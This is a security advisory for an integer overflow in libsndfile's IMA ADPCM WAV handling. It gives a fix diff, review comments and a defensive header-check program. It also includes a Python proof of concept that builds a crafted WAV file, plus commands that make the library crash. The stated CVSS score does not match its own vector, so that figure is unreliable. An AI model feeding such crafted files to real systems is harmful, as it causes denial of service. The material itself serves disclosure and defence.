### Vulnerability Overview

- **CVE ID**: CVE-2026-37555
- **Affected Versions**: libsndfile ≤ 1.2.2 (latest release)
- **Vulnerability Type**: CWE-190 (Integer Overflow or Wraparound)
- **CVSS Score**: 3.1 (AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H)
- **Reporter**: Feng Ning, Innora Security Research

### Impact Scope

- Two 32-bit multiplication overflows exist in `src/ima_adpcm.c`, allowing crafted WAV or W64 files to corrupt `psf->sf.frames` to negative or zero values.
- The AIFF code path received an explicit `sf_count_t` cast in CVE-2022-33065, but the WAV reader and write-close paths were not handled.
- Crafted WAV/W64 files containing large `samplesperblock * blocks` values may lead to out-of-bounds buffer allocation or iterative read/write loops, ultimately resulting in abnormal termination (DoS).

### Remediation

- Apply the same `sf_count_t` cast to the two affected paths, as implemented in the AIFF path.
- Specific fix code:

```c
// Line 235 — WAV/W64 path
- psf->sf.frames = pima->samplesperblock * pima->blocks ;
+ psf->sf.frames = (sf_count_t) pima->samplesperblock * pima->blocks ;

// Line 167 — ima_close write path
- psf->sf.frames = pima->samplesperblock * pima->blockcount / psf->sf.channels ;
+ psf->sf.frames = (sf_count_t) pima->samplesperblock * pima->blockcount / psf->sf.channels ;
```

### Proof of Concept (POC)

```python
import struct

def make_wav_ima(samplesperblock, blocks):
    # IMA ADPCM WAV with crafted header values
    channels = 1
    blockalign = (samplesperblock - 1) // 2 + 4
    # fmt chunk body: wFormatTag, nChannels, nSamplesPerSec, nAvgBytesPerSec,
    # nBlockAlign, wBitsPerSample, cbSize, wSamplesPerBlock.
    # The 'fmt ' chunk id and length are prepended below.
    fmt = struct.pack('<HHIIHHHH',
        0x0011, channels, 8000, blockalign,
        blockalign, 4, 2, samplesperblock
    )
    # With the values used below this is about 1.25 GB of zero bytes.
    data_size = blockalign * blocks
    wav = (b'RIFF' + struct.pack('<I', 36 + len(fmt) + 8 + data_size) +
           b'WAVEfmt ' + struct.pack('<I', len(fmt)) + fmt +
           b'data' + struct.pack('<I', data_size) +
           b'\x00' * data_size)
    return wav

with open('overflow.wav', 'wb') as f:
    f.write(make_wav_ima(50000, 50000))
```

```console
$ sndfile-info overflow.wav
$ python3 -c "import soundfile; soundfile.info('overflow.wav')"
# triggers integer overflow in ima_reader_init / ima_close
```
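
Review bot: in the "Line 235" hunk of the fix, the cast is attached to `pima->samplesperblock` alone, so the product is widened only because a cast binds tighter than `*`. That is correct, but it is easy to undo: a later cleanup that rewrites it as `(sf_count_t) (pima->samplesperblock * pima->blocks)` would multiply in 32 bits again. A short comment on the line pointing at the matching AIFF cast, plus a regression test using a large `samplesperblock * blocks` product, would protect it.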
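
Review bot: in the "Line 167" hunk of the fix, the expression still divides by `psf->sf.channels` with no guard visible on that line. If `channels` can be zero when `ima_close` runs on the write path, this is a division by zero, so either check it here or note where it is validated. The cast placement itself is fine: `samplesperblock` is widened before the multiply, and the division then happens in `sf_count_t`.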
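
A pre-parse check for the condition described under Impact Scope, as an added example (not libsndfile code and not part of the advisory): it reads only the RIFF header of a WAV buffer and reports whether `samplesperblock * blocks` would exceed the signed 32-bit range. The function names, the constructed 48-byte sample header, and the rule that `blocks` is the declared data size divided by the block align, rounded up, are assumptions.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
static uint32_t rd32(const uint8_t *p) { return p[0] | p[1] << 8 | p[2] << 16 | (uint32_t)p[3] << 24; }
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | p[1] << 8); }
static void wr(uint8_t *p, uint32_t v, int n) { while (n--) { *p++ = (uint8_t)v; v >>= 8; } }

/* Returns 1 if samplesperblock * blocks exceeds INT32_MAX (it would wrap in a
 * 32-bit multiply), 0 if it fits, -1 if buf is not a parseable IMA ADPCM WAV
 * header. Assumption: blocks = declared data size / block align, rounded up. */
int ima_wav_frames_overflow(const uint8_t *buf, size_t len, int64_t *frames)
{
    size_t off = 12; uint32_t align = 0, spb = 0;
    if (len < 12 || memcmp(buf, "RIFF", 4) || memcmp(buf + 8, "WAVE", 4)) return -1;
    while (off + 8 <= len) {
        const uint8_t *ck = buf + off;
        uint32_t size = rd32(ck + 4);
        if (!memcmp(ck, "data", 4)) {          /* only the declared size is needed */
            if (align == 0) return -1;         /* no usable fmt chunk before data */
            *frames = (int64_t)spb * (((int64_t)size + align - 1) / align);
            return *frames > INT32_MAX;
        }
        if (size > len - off - 8) return -1;   /* chunk body runs past the buffer */
        if (!memcmp(ck, "fmt ", 4)) {
            if (size < 20 || rd16(ck + 8) != 0x0011) return -1;  /* 0x0011: IMA ADPCM */
            align = rd16(ck + 20);             /* nBlockAlign */
            spb = rd16(ck + 26);               /* wSamplesPerBlock */
        }
        off += 8 + (size_t)size + (size & 1);  /* chunk bodies are padded to even size */
    }
    return -1;                                 /* no data chunk found */
}

/* Constructed 48-byte sample: RIFF/WAVE header, 20-byte fmt chunk, data chunk header. */
void make_header(uint8_t h[48], uint16_t tag, uint16_t align, uint16_t spb, uint32_t datasize)
{
    memset(h, 0, 48);  memcpy(h, "RIFF", 4);  wr(h + 4, 40 + datasize, 4);
    memcpy(h + 8, "WAVEfmt ", 8);  wr(h + 16, 20, 4);  wr(h + 20, tag, 2);  wr(h + 22, 1, 2);
    wr(h + 24, 8000, 4);  wr(h + 32, align, 2);  wr(h + 34, 4, 2);  wr(h + 36, 2, 2);
    wr(h + 38, spb, 2);  memcpy(h + 40, "data", 4);  wr(h + 44, datasize, 4);
}

int main(void)
{
    uint8_t h[48]; int64_t frames = 0;
    make_header(h, 0x0011, 25003, 50000, 25003u * 50000u);  /* header values from the PoC */
    int r = ima_wav_frames_overflow(h, sizeof h, &frames);
    return printf("overflow=%d frames=%lld\n", r, (long long)frames) < 0;
}
```

Because the check uses only the declared chunk sizes, it can run as an upload or ingest filter on the first few dozen bytes of a file before the file reaches an unpatched decoder.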